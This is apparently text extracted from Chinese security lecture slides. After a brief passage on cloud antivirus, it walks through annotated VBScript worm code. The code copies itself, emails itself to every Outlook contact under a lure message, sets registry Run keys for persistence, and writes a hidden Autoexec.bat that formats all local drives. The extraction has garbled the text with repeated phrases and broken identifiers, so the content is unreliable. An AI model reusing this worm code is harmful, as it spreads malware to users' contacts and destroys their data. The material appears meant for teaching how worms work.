46、整个互联网就是一个巨大的“杀毒软件杀毒软件”,参与者越多,每,参与者越多,每个参与者就越安全,整个互联网就会更安全。以金山毒霸为例,个参与者就越安全,整个互联网就会更安全。以金山毒霸为例,“依托于云安全技术,金山毒霸依托于云安全技术,金山毒霸2009病毒库病毒样本数量增加了病毒库病毒样本数量增加了5倍、日最大病毒处理能力提高了倍、日最大病毒处理能力提高了100倍、紧急病毒响应时间缩短到倍、紧急病毒响应时间缩短到1小时以内。小时以内。”可以说云安全开创了计算机安全可以说云安全开创了计算机安全2.0时代。时代。 47蠕虫病毒自我复制的部分代码蠕虫病毒自我复制的部分代码创建一个文件对象创建一个文件对
47、象Set objFs = CreateObject(Scripting.)通过文件系统对象的方法创建一个通过文件系统对象的方法创建一个TXT方法方法objFs.CreateTextFile c:virus.txt, 1将上述代码保存为将上述代码保存为.vbs的的VB脚本文件,执行后将在脚本文件,执行后将在C盘中创建一个盘中创建一个TXT文件。文件。执行代码执行代码如将第二条语句改为:如将第二条语句改为:objFs.Get).Copy(“c:virus.vbs”)就可以实现将自身复制到就可以实现将自身复制到C盘盘virus.bat文件文件执行代码执行代码48蠕虫病毒传播的部分代码蠕虫病毒传播的部
48、分代码创建一个创建一个OUTLOOK应用的对象应用的对象Set objOA=Wscript.CreateObject(Outlook.Application)取得取得MAPI名字空间名字空间Set objMapi=objOA.GetNameSpace (MAPI)遍历地址簿遍历地址簿For i=1 to objMapi.AddressLists.CountSet objAddList=objMapi.AddressLists (i)For j=1 To objAddList. AddressEntries.CountSet objMail=objOA.CreateItem (0)取得收件人邮件
49、地址取得收件人邮件地址objMail.Recipients.Add (objAddList. AddressEntries (j)设置邮件主题设置邮件主题,这个往往具有很大的诱惑性质这个往往具有很大的诱惑性质objMail.Subject=你好你好!49蠕虫病毒传播的部分代码蠕虫病毒传播的部分代码设置信件内容设置信件内容objMail.Body=这次给你的附件这次给你的附件,是我的新文档!是我的新文档! 把自己作为附件扩散出去把自己作为附件扩散出去objMail.Attachments.Add (c:virus.vbs)发送邮件发送邮件objMail.SenNextNext清空清空objMap
50、i变量变量,释放资源释放资源Set objMapi=Nothing清空清空objOA变量变量set objOA=Nothing50蠕虫病毒潜伏的部分代码蠕虫病毒潜伏的部分代码容错语句,避免程序崩溃容错语句,避免程序崩溃On Error Resume Nextdim wscr, rr创建创建WScript.Shell对象对象set wscr=CreateObject(WScript.Shell)读入注册表中的超时键值读入注册表中的超时键值rr=wscr.Regread(HKEY_CURRENT_USERSoftwareMicrosoftWindows Script HostSettingsTim
51、eout)if(rr=1) then超时设置超时设置wscr.RegWrite HKEY_CURRENT_USERSoftwareMicrosoftWindows Script HostSettingsTimeout , 0, REG_DWORDend if执行代码执行代码51蠕虫病毒潜伏的部分代码蠕虫病毒潜伏的部分代码以下代码是修改注册表,使得每次系统启动时自动执行脚本文件以下代码是修改注册表,使得每次系统启动时自动执行脚本文件RegCreate HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunMSKernel32, di
52、rsystem & MSKernel32.vbsRegCreate HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServicesWin32DLL, dirwin & Win32DLL.vbs52蠕虫病毒破坏的部分代码蠕虫病毒破坏的部分代码破坏硬盘的过程破坏硬盘的过程Sub killc() 容错语句,避免程序崩溃容错语句,避免程序崩溃 On Error Resume Next Dim fs, auto, disc, ds, ss, i, x, dir Set fs = CreateObject(Scripting.) 建立
53、或修改自动批处理建立或修改自动批处理 Set auto = fs.CreateTextFile(c:Autoexec.bat, True) 屏蔽掉删除的过程屏蔽掉删除的过程 auto.WriteLine (echo off) 加载磁盘缓冲加载磁盘缓冲 auto.WriteLine (Smartdrv) 得到磁盘驱动器的集合得到磁盘驱动器的集合 Set disc = fs.Drivers 53蠕虫病毒破坏的部分代码蠕虫病毒破坏的部分代码For Each ds In disc 如果磁盘驱动器是本地盘如果磁盘驱动器是本地盘 If ds.DriverType = 2 Then 就将符号连在一起就将符号
54、连在一起 ss = ss & ds.DriverLetter End If Next 得到符号串的反向小写形式得到符号串的反向小写形式 ss = LCase(StrReverse(Trim(ss) 遍历每个磁盘驱动器遍历每个磁盘驱动器 For i = 1 To Len(ss) 读每个磁盘驱动器的符号读每个磁盘驱动器的符号 x = Mid(ss, i, 1) 反向反向(从从Z:到到A:)自动格式化磁盘驱动器自动格式化磁盘驱动器 auto.WriteLine (format/autotest/q/u & x & :) Next54蠕虫病毒破坏的部分代码蠕虫病毒破坏的部分代码auto.Close Set dir = fs.GetFile(c:Autoexec.bat) dir.Attributes = dir.attribute + 2End Sub55
